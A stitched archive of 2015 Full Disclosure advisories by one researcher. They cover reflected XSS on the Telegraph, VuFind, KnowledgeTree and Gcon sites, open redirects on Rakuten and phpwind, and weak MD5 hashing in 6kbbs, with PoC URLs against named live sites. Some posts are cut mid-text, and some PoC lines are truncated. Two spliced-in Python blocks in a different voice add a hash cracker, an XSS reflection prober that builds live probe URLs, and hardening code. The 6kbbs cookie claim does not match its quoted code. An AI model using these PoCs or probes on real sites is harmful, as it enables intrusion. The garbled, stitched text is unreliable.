[FD] TeleGraph All Photo (Picture) Pages Have Been Vulnerable to XSS Cyber Attacks

2015-11-02 Thread Jing Wang
*TeleGraph All Photo (Picture) Pages Have Been Vulnerable to XSS Cyber
Attacks*


*Website Description:*
http://www.telegraph.co.uk


"The Daily Telegraph is a British daily morning English-language broadsheet
newspaper, published in London by Telegraph Media Group and distributed
throughout the United Kingdom and internationally. The newspaper was
founded by Arthur B. Sleigh in June 1855 as The Daily Telegraph and
Courier, and since 2004 has been owned by David and Frederick Barclay. It
had a daily circulation of 523,048 in March 2014, down from 552,065 in
early 2013. In comparison, The Times had an average daily circulation of
400,060, down to 394,448. The Daily Telegraph has a sister paper, The
Sunday Telegraph, that was started in 1961, which had circulation of
418,670 as of March 2014. The two printed papers currently are run
separately with different editorial staff, but there is cross-usage of
stories. News articles published in either, plus online Telegraph articles,
may also be published on the Telegraph Media Group's www.telegraph.co.uk
website, all under The Telegraph title." (From Wikipedia)




Discovered and Disclosed By:
Wang Jing, Division of Mathematical Sciences (MAS), School of Physical and
Mathematical Sciences (SPMS), Nanyang Technological University (NTU),
Singapore. (@justqdjing)
http://www.tetraph.com/wangjing





*(1) Vulnerability Description:*
Telegraph has a web security bug problem. It is vulnerable to XSS attacks.
In fact, all its photo pages are vulnerable to XSS (Cross-Site Scripting)
vulnerabilities. Telegraph's picture pages use "frame" as their parameter.
All its web pages that use "frame" are vulnerable to the bugs. Those
vulnerabilities have been patched now.


*Examples of Vulnerable Links:*
http://www.telegraph.co.uk/culture/culturepicturegalleries/10663967/The-worlds-most-spectacular-theatres.html?frame=2836095
http://www.telegraph.co.uk/property/investmentinproperty/10609314/For-sale-top-20-properties-ripe-for-investment.html?frame=2808162
http://www.telegraph.co.uk/foodanddrink/foodanddrinkpicturegalleries/9737226/Elephant-dung-coffee-Black-Ivory-beans-passed-through-the-animals-guts.html?frame=2424280
http://www.telegraph.co.uk/education/9487434/Graduate-jobs-Best-languages-to-study.html?frame=2314790
http://www.telegraph.co.uk/motoring/picturegalleries/10782171/The-20-best-cars-to-own-in-2014.html?frame=2890278



*POC Code:*
http://www.telegraph.co.uk/culture/culturepicturegalleries/10663967/The-worlds-most-spectacular-theatres.html?frame=2836095;>
http://www.telegraph.co.uk/property/investmentinproperty/10609314/For-sale-top-20-properties-ripe-for-investment.html?frame=2808162;>
http://www.telegraph.co.uk/foodanddrink/foodanddrinkpicturegalleries/9737226/Elephant-dung-coffee-Black-Ivory-beans-passed-through-the-animals-guts.html?frame=2424280;>
http://www.telegraph.co.uk/education/9487434/Graduate-jobs-Best-languages-to-study.html?frame=2314790;>
http://www.telegraph.co.uk/motoring/picturegalleries/10782171/The-20-best-cars-to-own-in-2014.html?frame=2890278;>


The vulnerability can be attacked without user login. Tests were performed
on Firefox (37.0.2) on Ubuntu (14.04) and IE (8.0.7601) on Windows 7. The
bugs were found by using CSXDS.




*(2) XSS Description:*
The description of XSS is: "Cross-Site Scripting (XSS) attacks are a type
of injection, in which malicious scripts are injected into otherwise benign
and trusted web sites. XSS attacks occur when an attacker uses a web
application to send malicious code, generally in the form of a browser side
script, to a different end user. Flaws that allow these attacks to succeed
are quite widespread and occur anywhere a web application uses input from a
user within the output it generates without validating or encoding it."
(OWASP)




*Poc Video:*
https://www.youtube.com/watch?v=SqjlabJ1OzA&feature=youtu.be





*Blog Details:*
http://www.tetraph.com/security/website-test/telegraph-xss/
http://securityrelated.blogspot.com/2015/10/telegraph-xss-0day.html





*(3) Vulnerability Disclosure:*
These vulnerabilities have been patched now.





--
Jing Wang,
Division of Mathematical Sciences (MAS),
School of Physical and Mathematical Sciences (SPMS),
Nanyang Technological University (NTU), Singapore.
http://www.tetraph.com/wangjing/
https://twitter.com/justqdjing

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/


[FD] VuFind 1.0 Web Application Reflected XSS (Cross-site Scripting) 0-Day Bug Security Issue

2015-09-25 Thread Jing Wang
*VuFind 1.0 Web Application Reflected XSS (Cross-site Scripting) 0-Day
Bug Security Issue*



Exploit Title: VuFind Results? lookfor parameter Reflected XSS Web
Security Vulnerability
Product: VuFind
Vendor: VuFind
Vulnerable Versions: 1.0
Tested Version: 1.0
Advisory Publication: September 20, 2015
Latest Update: September 25, 2015
Vulnerability Type: Cross-Site Scripting [CWE-79]
CVE Reference:
Impact CVSS Severity (version 2.0):
CVSS v2 Base Score: 4.3 (MEDIUM) (AV:N/AC:M/Au:N/C:N/I:P/A:N) (legend)
Impact Subscore: 2.9
Exploitability Subscore: 8.6
CVSS Version 2 Metrics:
Access Vector: Network exploitable; Victim must voluntarily interact with
attack mechanism
Access Complexity: Medium
Authentication: Not required to exploit
Impact Type: Allows unauthorized modification
Discoverer and Reporter: Wang Jing [School of Physical and Mathematical
Sciences (SPMS), Nanyang Technological University (NTU), Singapore]
(@justqdjing)







*Suggestion Details:*


*(1) Vendor & Product Description:*


*Vendor:*
VuFind



*Product & Vulnerable Versions:*
VuFind
1.0



*Vendor URL & Download:*
Product can be obtained from here,
http://sourceforge.net/p/vufind/news/




*Product Introduction Overview:*
"VuFind is a library resource portal designed and developed for libraries
by libraries. The goal of VuFind is to enable your users to search and
browse through all of your library's resources by replacing the traditional
OPAC to include: Catalog Records, Locally Cached Journals, Digital Library
Items, Institutional Repository, Institutional Bibliography, Other Library
Collections and Resources. VuFind is completely modular so you can
implement just the basic system, or all of the components. And since it's
open source, you can modify the modules to best fit your need or you can
add new modules to extend your resource offerings. VuFind runs on Solr
Energy. Apache Solr, an open source search engine, offers amazing
performance and scalability to allow for VuFind to respond to search
queries in milliseconds time. It has the ability to be distributed if you
need to spread the load of the catalog over many servers or in a server
farm environment. VuFind is offered for free through the GPL open source
license. This means that you can use the software for free. You can modify
the software and share your successes with the community! Take a look at
our VuFind Installations Wiki page to see how a variety of organizations
have taken advantage of VuFind's flexibility. If you are already using
VuFind, feel free to edit the page and share your accomplishments. "






*(2) Vulnerability Details:*
VuFind web application has a computer security problem. Hackers can exploit
it via reflected XSS cyber attacks. This may allow a remote attacker to
create a specially crafted request that would execute arbitrary script code
in a user's browser session within the trust relationship between their
browser and the server.

Several other similar 0-day vulnerabilities in this product have been found
by other bug researchers before. VuFind has patched some of them. "scip
AG was founded in 2002. We are driven by innovation, sustainability,
transparency, and enjoyment of our work. We are completely self-funded and
are thus in the comfortable position to provide completely independent and
neutral services. Our staff consists of highly specialized experts who
focus on the topic information security and continuously further their
expertise through advanced training".


*(2.1)* The code flaw occurs at the "lookfor" parameter in the
"/vufind/Resource/Results?" page.

Another researcher has reported a similar vulnerability here and VuFind
has patched it.
https://vufind.org/jira/si/jira.issueviews:issue-html/VUFIND-54/VUFIND-54.html







*(3) Solution:*
Update to the new version.









*References:*
http://tetraph.com/security/xss-vulnerability/vufind-xss/
http://securityrelated.blogspot.com/2015/09/vufind-xss.html
https://vulnerabilitypost.wordpress.com/2015/09/22/vufind-xss/
http://tetraph.blog.163.com/blog/static/234603051201582525130175/
https://packetstormsecurity.com/files/133374/Winmail-Server-4.2-Cross-Site-Scripting.html
http://marc.info/?l=oss-security&m=144094021709472&w=4
http://lists.openwall.net/full-disclosure/2015/08/31/2
http://ithut.tumblr.com/post/128012509383/webcabinet-winmail-server-42-reflected-xss
http://seclists.org/fulldisclosure/2015/Aug/84







--
Jing Wang,
Division of Mathematical Sciences (MAS),
School of Physical and Mathematical Sciences (SPMS),
Nanyang Technological University (NTU), Singapore.
http://www.tetraph.com/wangjing/
https://twitter.com/justqdjing



[FD] KnowledgeTree OSS 3.0.3b Reflected XSS (Cross-site Scripting) Web Application 0-Day Security Bug

2015-08-30 Thread Jing Wang
*KnowledgeTree OSS 3.0.3b Reflected XSS (Cross-site Scripting) Web
Application 0-Day Security Bug*



Exploit Title: KnowledgeTree login.php errorMessage parameter Reflected
XSS Web Security Vulnerability
Product: Knowledge Tree Document Management System
Vendor: Knowledge Inc
Vulnerable Versions: OSS 3.0.3b
Tested Version: OSS 3.0.3b
Advisory Publication: August 22, 2015
Latest Update: August 31, 2015
Vulnerability Type: Cross-Site Scripting [CWE-79]
CVE Reference:
Impact CVSS Severity (version 2.0):
CVSS v2 Base Score: 4.3 (MEDIUM) (AV:N/AC:M/Au:N/C:N/I:P/A:N) (legend)
Impact Subscore: 2.9
Exploitability Subscore: 8.6
CVSS Version 2 Metrics:
Access Vector: Network exploitable; Victim must voluntarily interact with
attack mechanism
Access Complexity: Medium
Authentication: Not required to exploit
Impact Type: Allows unauthorized modification
Discoverer and Reporter: Wang Jing [School of Physical and Mathematical
Sciences (SPMS), Nanyang Technological University (NTU), Singapore]
(@justqdjing)









*Suggestion Details:*


*(1) Vendor & Product Description:*


*Vendor:*
KnowledgeTree



*Product & Vulnerable Versions:*
Knowledge Tree Document Management System
OSS 3.0.3b



*Vendor URL & Download:*
Product can be obtained from here,
http://download.cnet.com/KnowledgeTree-Document-Management-System/3000-10743_4-10632972.html
http://www.knowledgetree.com/




*Product Introduction Overview:*
KnowledgeTree is open source document management software designed for
business people to use and install. Seamlessly connect people, ideas, and
processes to satisfy all your collaboration, compliance, and business
process requirements. KnowledgeTree works with Microsoft® Office®,
Microsoft® Windows® and Linux®.







*(2) Vulnerability Details:*
KnowledgeTree web application has a computer security problem. Hackers can
exploit it via reflected XSS cyber attacks. This may allow a remote attacker
to create a specially crafted request that would execute arbitrary script
code in a user's browser session within the trust relationship between
their browser and the server.

Several other similar 0-day vulnerabilities in this product have been found
by other bug hunter researchers before. KnowledgeTree has patched some of
them. Bugtraq is an electronic mailing list dedicated to issues about
computer security. On-topic issues are new discussions about
vulnerabilities, vendor security-related announcements, methods of
exploitation, and how to fix them. It is a high-volume mailing list, and
almost all new vulnerabilities are discussed there. It has listed similar
exploits, such as Bugtraq (SecurityFocus) 32920.



*(2.1)* The code flaw occurs at the errorMessage parameter in the login.php
page.

One similar bug is CVE-2008-5858. Its X-Force ID is 47529.








*References:*
http://tetraph.com/security/xss-vulnerability/knowledgetree-oss-3-0-3b-reflected-xss/
http://securityrelated.blogspot.com/2015/08/knowledgetree-oss-303b-reflected-xss.html
http://seclists.org/fulldisclosure/2015/May/31
https://progressive-comp.com/?l=full-disclosure&m=143110966112898&w=1
https://packetstormsecurity.com/files/132927/PhotoPost-PHP-4.8c-Cross-Site-Scripting.html
http://whitehatpost.blog.163.com/blog/static/242232054201573084141976/
https://hackertopic.wordpress.com/2015/08/22/knowledgetree-oss-3-0-3b-reflected-xss/
http://lists.openwall.net/full-disclosure/2015/03/10/5
http://marc.info/?l=full-disclosure&m=143251239323317&w=4
https://www.mail-archive.com/fulldisclosure%40seclists.org/msg01415.html








--
Jing Wang,
Division of Mathematical Sciences (MAS),
School of Physical and Mathematical Sciences (SPMS),
Nanyang Technological University (NTU), Singapore.
http://www.tetraph.com/wangjing/
https://twitter.com/justqdjing


[FD] PhotoPost PHP 4.8c Cookie Based Stored XSS (Cross-site Scripting) Web Application 0-Day Bug

2015-08-01 Thread Jing Wang
://www.photopost.com/photopost/adm-index.php
)









*References:*
http://tetraph.com/security/xss-vulnerability/photopost-php/
http://securityrelated.blogspot.com/2015/07/photopost-php-48c-cookie-based-stored.html
https://progressive-comp.com/?l=full-disclosure&m=142649827629327&w=1
https://www.mail-archive.com/fulldisclosure%40seclists.org/msg01901.html
https://vulnerabilitypost.wordpress.com/2015/07/27/photopost-php/
http://tetraph.blog.163.com/blog/static/234603051201563055350773/
http://permalink.gmane.org/gmane.comp.security.fulldisclosure/1817
http://www.inzeed.com/kaleidoscope/xss-vulnerability/rakuten-website-xss/
http://seclists.org/fulldisclosure/2015/Mar/56
http://lists.openwall.net/full-disclosure/2015/03/07/4







--
Jing Wang,
Division of Mathematical Sciences (MAS),
School of Physical and Mathematical Sciences (SPMS),
Nanyang Technological University (NTU),
Singapore.
http://www.tetraph.com/wangjing/
https://twitter.com/justqdjing



[FD] 6kbbs v8.0 Weak Encryption Cryptography Security Vulnerabilities

2015-06-11 Thread Jing Wang
*6kbbs v8.0 Weak Encryption Cryptography Security Vulnerabilities*


Exploit Title: 6kbbs Weak Encryption Web Security Vulnerabilities
Vendor: 6kbbs
Product: 6kbbs
Vulnerable Versions: v7.1 & v8.0
Tested Version: v7.1 & v8.0
Advisory Publication: June 08, 2015
Latest Update: June 10, 2015
Vulnerability Type: Inadequate Encryption Strength [CWE-326]
CVE Reference: *
CVSS Severity (version 2.0):
Discover and Reporter: Wang Jing [School of Physical and Mathematical
Sciences (SPMS), Nanyang Technological University (NTU), Singapore]
(@justqdjing)






*Recommendation Details:*


*(1) Vendor & Product Description:*


Vendor:
6kbbs



*Product & Vulnerable Versions:*
6kbbs
v7.1
v8.0



*Vendor URL & download:*
6kbbs can be obtained from here,
http://www.6kbbs.com/download.html




*Product Introduction Overview:*
6kbbs V8.0 is a high-performance forum built using PHP + MySQL; its code is
simple, easy to use, powerful, fast and so on. It is an excellent community
forum program. The program is simple but not simplistic; fast and small;
the interface is generous and has good scalability; it is functional and
practical, pursuing superior performance, a good interface, and the user's
preferred utility functions. Forum technical realization: (a) Interface:
using an XHTML + CSS structure, so the structure of the page is easy to
modify; the static page code saved in transmission greatly reduces the
amount of data transmitted over the network; it improves interface
scalability, is more in line with web standards, and supports Internet
Explorer, Firefox, Opera and other major browsers. (b) Program: mature ASP +
ACCESS technology; the installation process is extremely simple, and the
environment is also very common.


(1) PHP version: (a) 6kbbs V8.0 started using the PHP + MySQL architecture.
(b) Currently (July 2010) it is still in the testing phase; 6kbbs V8.0 is
the latest official release. (2) ASP version: 6kbbs (6k Forum) is an
excellent community forum program. The program is simple but not
simplistic; fast and small; the interface is generous and has good
scalability; it is functional and practical, pursuing superiority, a good
interface, and practical functions of choice for subscribers.





*(2) Vulnerability Details:*
6kbbs web application has a computer security problem. It can be exploited
by weak encryption attacks. The software stores or transmits sensitive data
using an encryption scheme that is theoretically sound, but is not strong
enough for the level of protection required. A weak encryption scheme can
be subjected to brute force attacks that have a reasonable chance of
succeeding using current attack methods and resources.


Several 0-day web cyber bugs in 6kbbs products have been found by other
bug hunter researchers before. 6kbbs has patched some of them. The Full
Disclosure mailing list is a public forum for detailed discussion of
vulnerabilities and exploitation techniques, as well as tools, papers,
news, and events of interest to the community. FD differs from other
security lists in its open nature and support for researchers' right to
decide how to disclose their own discovered bugs. The full disclosure
movement has been credited with forcing vendors to better secure their
products and to publicly acknowledge and fix flaws rather than hide them.
Vendor legal intimidation and censorship attempts are not tolerated here!
A great many web security issues have been published here.




Source Code:
<?php
// Legacy-login path from convert/discuz72/loginext.php: verify a Discuz 7.2
// style hash, md5(md5($userpass) . $salt), and on success rewrite the row
// with 6kbbs's own $userpass_encrypt value and an empty salt.
if (empty($row)) {
    $extrow = $db->row_select_one('users', "username='{$username}'");
    if (!empty($extrow) && !empty($extrow['salt'])) {
        if (md5(md5($userpass) . $extrow['salt']) == $extrow['userpass']) {
            $row = $extrow;
            $new_row['userpass'] = $userpass_encrypt;
            $new_row['salt'] = '';
            $db->row_update('users', $new_row, "id={$extrow['id']}");
        }
    }
}
?>



Source Code From:
http://code.google.com/p/6kbbs/source/browse/trunk/convert/discuz72/loginext.php?r=16


We can see that the userpass stored in the cookie was encrypted using the
$userpass user password directly, and there is no HttpOnly attribute at
all. Since MD5 is used for the encryption, it is easy for hackers to break
the encrypted message.


The MD5 message-digest cryptography algorithm is a widely used
cryptographic hash function producing a 128-bit (16-byte) hash value,
typically expressed in text format as a 32 digit hexadecimal number. Papers
about it have been published on Eurocrypt, Asiacrypt and Crypto. Meanwhile,
researchers focusing on it spread in Computer Science, Computer
Engineering, IEEE and Mathematics. MD5 has been utilized in a wide variety
of cryptographic applications, and is also commonly used to verify data
integrity. MD5 was designed by Ronald Rivest in 1991 to replace an earlier
hash function, MD4. The source code in RFC 1321 contains a by-attribution
RSA license. (Wikipedia)








*References:*
http://tetraph.com/security/weak-encryption/6kbbs-v8-0-weak-encryption/
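The scheme criticised above, reimplemented as an added example (this is not 6kbbs code): md5(md5(pass) . salt) with the salt cleared falls to a wordlist in microseconds, and a cookie that carries it without HttpOnly hands that value to any injected script. Beside it sits what a practitioner would replace it with: a salted, slow PBKDF2 store with constant-time comparison, and a session cookie made of a random token plus a server MAC, so nothing derived from the password ever leaves the server. The server key, round count and wordlist are constructed for the demo.

```python
"""Added example, not 6kbbs code: the md5(md5(pass) . salt) scheme described above,
cracked with a small wordlist, next to a salted PBKDF2 store and a session cookie
built from a random token rather than from the password."""
import hashlib
import hmac
import os
import secrets
from typing import Iterable, Optional

# --- Weak scheme, reimplemented from the advisory's description ---------------------

def weak_hash(password: str, salt: str = "") -> str:
    """md5(md5(password) . salt). Once the converter clears the salt this is two
    unsalted MD5 rounds: fast, deterministic and precomputable."""
    inner = hashlib.md5(password.encode()).hexdigest()
    return hashlib.md5((inner + salt).encode()).hexdigest()

def crack_weak_hash(stored: str, wordlist: Iterable[str], salt: str = "") -> Optional[str]:
    """Offline guessing. A cookie readable by script (no HttpOnly) or a leaked users
    table hands the attacker `stored`; every guess costs two MD5 calls."""
    for candidate in wordlist:
        if weak_hash(candidate, salt) == stored:
            return candidate
    return None

# --- Hardened storage: slow, salted KDF, constant-time comparison -------------------
PBKDF2_ROUNDS = 200_000  # assumption: tune so one check takes ~100 ms on your hardware

def hash_password(password: str, salt: Optional[bytes] = None) -> str:
    salt = os.urandom(16) if salt is None else salt
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ROUNDS)
    return f"pbkdf2_sha256${PBKDF2_ROUNDS}${salt.hex()}${dk.hex()}"

def verify_password(password: str, stored: str) -> bool:
    try:
        algo, rounds, salt_hex, dk_hex = stored.split("$")
    except ValueError:
        return False
    if algo != "pbkdf2_sha256":
        return False
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), bytes.fromhex(salt_hex), int(rounds))
    return hmac.compare_digest(dk.hex(), dk_hex)

# --- Session cookie: random token plus server MAC, never a password hash ------------
SERVER_KEY = b"constructed-demo-key-replace-with-one-from-config"  # constructed value

def issue_session_cookie(user_id: int, key: bytes = SERVER_KEY) -> str:
    token = secrets.token_hex(16)
    body = f"{user_id}:{token}"
    tag = hmac.new(key, body.encode(), hashlib.sha256).hexdigest()
    return f"{body}:{tag}"

def verify_session_cookie(cookie: str, key: bytes = SERVER_KEY) -> Optional[int]:
    """Returns the user id for a cookie with a valid MAC, else None."""
    parts = cookie.split(":")
    if len(parts) != 3 or not parts[0].isdigit():
        return None
    user_id, token, tag = parts
    expected = hmac.new(key, f"{user_id}:{token}".encode(), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(expected, tag):
        return None
    return int(user_id)

def set_cookie_header(name: str, value: str) -> str:
    """HttpOnly keeps the cookie out of reach of injected script; Secure and SameSite
    limit where the browser will send it."""
    return f"Set-Cookie: {name}={value}; HttpOnly; Secure; SameSite=Lax; Path=/"

if __name__ == "__main__":
    leaked = weak_hash("letmein")  # what an attacker reads from the cookie
    print("weak scheme cracked:", crack_weak_hash(leaked, ["123456", "password", "letmein"]))
    record = hash_password("letmein")
    print("pbkdf2 verify:", verify_password("letmein", record), verify_password("wrong", record))
    print(set_cookie_header("sid", issue_session_cookie(42)))
```

Whether a site needs PBKDF2, bcrypt, scrypt or Argon2 is a deployment choice; the point the example makes is that the cookie should never be a function of the password at all, so cracking what the browser holds gains nothing.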

[FD] FC2 Rakuten Online Websites Multiple XSS (Cross-site Scripting) and Open Redirect Cyber Vulnerabilities

2015-06-11 Thread Jing Wang
, and events of interest to the community. FD differs from other
security lists in its open nature and support for researchers' right to
decide how to disclose their own discovered bugs. The full disclosure
movement has been credited with forcing vendors to better secure their
products and to publicly acknowledge and fix flaws rather than hide them.
Vendor legal intimidation and censorship attempts are not tolerated here!
A great many of the following web security issues have been published here:
Buffer overflow, HTTP Response Splitting (CRLF), CMD Injection, SQL
injection, Phishing, Cross-site scripting, CSRF, Cyber-attack, Unvalidated
Redirects and Forwards, Information Leakage, Denial of Service, File
Inclusion, Weak Encryption, Privilege Escalation, Directory Traversal, HTML
Injection, Spam.


The program code flaw can be attacked without user login. Tests were
performed on Microsoft IE (9.0.8112.16421) on Windows 7, Mozilla Firefox
(37.0.2) & Google Chromium 42.0.2311 (64-bit) on Ubuntu (14.04.2), and Apple
Safari 6.1.6 on Mac OS X v10.9 Mavericks.


Since I know only a little Japanese, I am not sure whether Rakuten pays much
attention to Open Redirect Vulnerabilities or not.





*(2.2.2)* Use one of the webpages for the following tests. The webpage
address is "http://www.inzeed.com/kaleidoscope/". We can suppose that this
webpage is malicious.



Vulnerable URL 1:
http://account.rakuten-sec.co.jp/cgi-bin/btracking?URL=https://www.netflix.com/movies/

POC Code:
http://account.rakuten-sec.co.jp/cgi-bin/btracking?URL=http://www.inzeed.com/kaleidoscope/




Vulnerable URL 2:
http://affiliate.rakuten.com/fs-bin/click?u1=no_refer&id=Jv*v1/Wldzg&subid=0&offerid=229300.1&type=10&tmpid=6933&RD_PARM1=http%3A%2F%2Fadcash.com%2fmoney

POC Code:
http://affiliate.rakuten.com/fs-bin/click?u1=no_refer&id=Jv*v1/Wldzg&subid=0&offerid=229300.1&type=10&tmpid=6933&RD_PARM1=http://www.inzeed.com/kaleidoscope/




Vulnerable URL 3:
http://clickfrom.rakuten.com/default.asp?adid=17379&sURL=http%3A%2F%2Fwww.craigslist.org

POC Code:
http://clickfrom.rakuten.com/default.asp?sURL=http://www.inzeed.com/kaleidoscope/






*Poc Video:*
https://www.youtube.com/watch?v=uxsuLgAdpCw


*Blog Detail:*
http://tetraph.com/security/open-redirect/rakuten-open-redirect/
http://securityrelated.blogspot.com/2015/06/rakuten-open-redirect.html





*(2.2.3) Vulnerability Disclosure:*
Those vulnerabilities are not patched now.








*More Details:*
http://tetraph.com/security/web-security/fc2-rakuten-xss-and-url-redirection/
http://securityrelated.blogspot.com/2015/06/fc2-rakuten-online-websites-multiple.html






--
Jing Wang,
Division of Mathematical Sciences (MAS),
School of Physical and Mathematical Sciences (SPMS),
Nanyang Technological University (NTU),
Singapore.
http://www.tetraph.com/wangjing/
https://twitter.com/justqdjing


[FD] Gcon Tech Solutions v1.0 XSS (Cross-site Scripting) Web Security Vulnerabilities

2015-05-24 Thread Jing Wang
*Gcon Tech Solutions v1.0 XSS (Cross-site Scripting) Web Security
Vulnerabilities*


Exploit Title: Gcon Tech Solutions v1.0 content.php? id Parameter XSS
Security Vulnerabilities
Product: Gcon Tech Solutions
Vendor: Gcon Tech Solutions
Vulnerable Versions: v1.0
Tested Version: v1.0
Advisory Publication: May 23, 2015
Latest Update: May 23, 2015
Vulnerability Type: Cross-Site Scripting [CWE-79]
CVE Reference: *
Impact CVSS Severity (version 2.0):
CVSS v2 Base Score: 4.3 (MEDIUM) (AV:N/AC:M/Au:N/C:N/I:P/A:N) (legend)
Impact Subscore: 2.9
Exploitability Subscore: 8.6
Writer and Reporter: Wang Jing [School of Physical and Mathematical
Sciences, Nanyang Technological University (NTU), Singapore] (@justqdjing)




*Recommendation Details:*


*(1) Vendor & Product Description:*


*Vendor:*
Gcon Tech Solutions



*Product & Vulnerable Versions:*
Gcon Tech Solutions
v1.0



*Vendor URL & Download:*
Gcon Tech Solutions can be obtained from here,
http://www.gconts.com/Development.htm



*Google Dork:*
Developed and maintained by Gcon Tech Solutions



*Product Introduction Overview:*
Over the years we have developed business domain knowledge in various
business areas. We provide Development Services either on a time and
material or a turn-key fixed price basis, depending on the nature of the
project. Application Development Services offered by Gcon Tech Solutions
help streamline business processes, systems and information. Gcon Tech
Solutions has a well-defined and mature application development process,
which comprises the complete System Development Life Cycle (SDLC) from
technology strategy formulation to deployment, production operations and
support. We fulfil our client's requirements firstly from our existing
database of highly skilled professionals or by recruiting the finest
candidates locally. We analyze your business requirements and, taking into
account any constraints and preferred development tools, prepare a fixed
price quote. This offers our customers a guaranteed price and a single
point of contact for easy administration. We adopt the Rapid Application
Development technique where possible for speedy delivery of the
solutions. Salient features of Gcon Tech Solutions Application Development
Services: (a) Flexible and customizable. (b) Industry-driven best
practices. (c) Knowledge base and reusable components repository. (d) Ensure
process integration with customers at project initiation.




*(2) Vulnerability Details:*
Gcon Tech Solutions web application has a computer cyber security bug
problem. It can be exploited by XSS attacks. This may allow a remote
attacker to create a specially crafted request that would execute arbitrary
script code in a user's browser session within the trust relationship
between their browser and the server.

Several other similar 0-day vulnerabilities in this product have been found
by other bug hunter researchers before. Gcon Tech Solutions has patched
some of them. The Mail Archive automatically detects when it receives mail
from a new list. Thus, you are encouraged, although certainly not required,
to send a test message to the newly archived list. If you are adding
several lists to the archive, send a separate and distinct test message to
each one. It also publishes suggestions, advisories and solution details
related to XSS vulnerabilities and cyber intelligence recommendations.


*(2.1)* The first programming code flaw occurs at the id parameter in the
content.php page.








*References:*
http://www.tetraph.com/security/xss-vulnerability/gcon-tech-solutions-v1-0-xss/
http://securityrelated.blogspot.com/2015/05/gcon-tech-solutions-v10-xss-cross-site.html
http://www.inzeed.com/kaleidoscope/computer-web-security/gcon-tech-solutions-v1-0-xss/
https://webtechwire.wordpress.com/2015/05/23/gcon-tech-solutions-v1-0-xss/
http://whitehatpost.blog.163.com/blog/static/24223205420154245138791/
https://www.mail-archive.com/fulldisclosure%40seclists.org/msg02028.html
http://seclists.org/fulldisclosure/2015/May/34
https://www.bugscan.net/#!/x/21839
http://lists.openwall.net/full-disclosure/2015/04/05/8
http://permalink.gmane.org/gmane.comp.security.fulldisclosure/1957





--
Jing Wang,
Division of Mathematical Sciences (MAS),
School of Physical and Mathematical Sciences (SPMS),
Nanyang Technological University (NTU),
Singapore.
http://www.tetraph.com/wangjing/
https://twitter.com/justqdjing

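The four reflected-XSS posts in this thread (Telegraph's frame, VuFind's lookfor, KnowledgeTree's errorMessage and Gcon's id parameters) all come down to one defect: a query value copied into the HTML response without encoding. As an added example, not code from any of those advisories or products, the block below shows the parameter-by-parameter probe a tester runs to find that defect, a constructed page that has it next to the same page with contextual output encoding, and a helper that builds the live probe URLs. The hostname, parameter names and canary string are constructed for the demo.

```python
"""Added example, not code from any of the advisories above: a per-parameter reflection
probe of the kind that finds bugs like the frame, lookfor, errorMessage and id cases,
run against a constructed vulnerable page and its encoded counterpart."""
import html
from typing import Callable, Dict, List
from urllib.parse import parse_qsl, urlencode, urlsplit, urlunsplit

Renderer = Callable[[Dict[str, str]], str]

# The canary carries the characters needed to leave an attribute or open a tag.
CANARY = 'xsscanary"><s>'

def render_vulnerable(params: Dict[str, str]) -> str:
    """Constructed stand-in for a page that echoes query values unencoded: `frame`
    lands inside a double-quoted attribute, `lookfor` in element text."""
    frame = params.get("frame", "")
    lookfor = params.get("lookfor", "")
    return (f'<a href="/gallery.html?frame={frame}">next picture</a>\n'
            f'<p>Results for {lookfor}</p>')

def render_fixed(params: Dict[str, str]) -> str:
    """Same page with output encoding for the HTML context: html.escape(quote=True)
    turns < > & " and ' into entities, so a value can neither close the attribute
    nor start a tag. A numeric id such as `frame` should also be validated as an int."""
    frame = html.escape(params.get("frame", ""), quote=True)
    lookfor = html.escape(params.get("lookfor", ""), quote=True)
    return (f'<a href="/gallery.html?frame={frame}">next picture</a>\n'
            f'<p>Results for {lookfor}</p>')

def probe_reflection(url: str, render: Renderer, canary: str = CANARY) -> List[str]:
    """Inject the canary into each query parameter in turn and return the names whose
    value comes back byte-for-byte, i.e. without encoding."""
    base = dict(parse_qsl(urlsplit(url).query, keep_blank_values=True))
    hits: List[str] = []
    for name in base:
        trial = dict(base)
        trial[name] = canary
        if canary in render(trial):
            hits.append(name)
    return hits

def build_probe_urls(url: str, canary: str = CANARY) -> Dict[str, str]:
    """For a live check: one URL per parameter with the canary substituted (and
    URL-encoded), to be fetched and inspected with the same `canary in body` test."""
    parts = urlsplit(url)
    pairs = parse_qsl(parts.query, keep_blank_values=True)
    out: Dict[str, str] = {}
    for i, (name, _) in enumerate(pairs):
        q = [(n, canary if j == i else v) for j, (n, v) in enumerate(pairs)]
        out[name] = urlunsplit(parts._replace(query=urlencode(q)))
    return out

if __name__ == "__main__":
    url = "http://site.example/gallery.html?frame=2836095&lookfor=theatres"  # constructed
    print("vulnerable renderer reflects:", probe_reflection(url, render_vulnerable))
    print("fixed renderer reflects:     ", probe_reflection(url, render_fixed))
    for name, probe in build_probe_urls(url).items():
        print(name, "->", probe)
```

The `canary in body` test is deliberately strict: a page that reflects the value only in encoded form (`&quot;&gt;&lt;s&gt;`) is reported clean, while any raw copy, in an attribute, in text or in a script block, is reported as a hit and then examined by hand for the context it landed in.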


[FD] phpwind v8.7 Unvalidated Redirects and Forwards Web Security Vulnerabilities

2015-05-24 Thread Jing Wang
*phpwind v8.7 Unvalidated Redirects and Forwards Web Security
Vulnerabilities*



Exploit Title: phpwind v8.7 goto.php? url Parameter Open Redirect Security
Vulnerabilities
Product: phpwind
Vendor: phpwind
Vulnerable Versions: v8.7
Tested Version: v8.7
Advisory Publication: May 24, 2015
Latest Update: May 24, 2015
Vulnerability Type: URL Redirection to Untrusted Site ('Open Redirect')
[CWE-601]
CVE Reference: *
Impact CVSS Severity (version 2.0):
CVSS v2 Base Score: 5.8 (MEDIUM) (AV:N/AC:M/Au:N/C:P/I:P/A:N) (legend)
Impact Subscore: 4.9
Exploitability Subscore: 8.6
Writer and Reporter: Wang Jing [School of Physical and Mathematical
Sciences (SPMS), Nanyang Technological University (NTU), Singapore]
(@justqdjing)





*Caution Details:*


*(1) Vendor & Product Description:*


*Vendor:*
phpwind



*Product & Vulnerable Versions:*
phpwind
v8.7



*Vendor URL & Download:*
Product can be obtained from here,
http://www.phpwind.net/thread/166





*Product Introduction Overview:*
Today, the country's 200,000 worth of small sites, there are nearly
100,000 community site uses phpwind, has accumulated more than one million
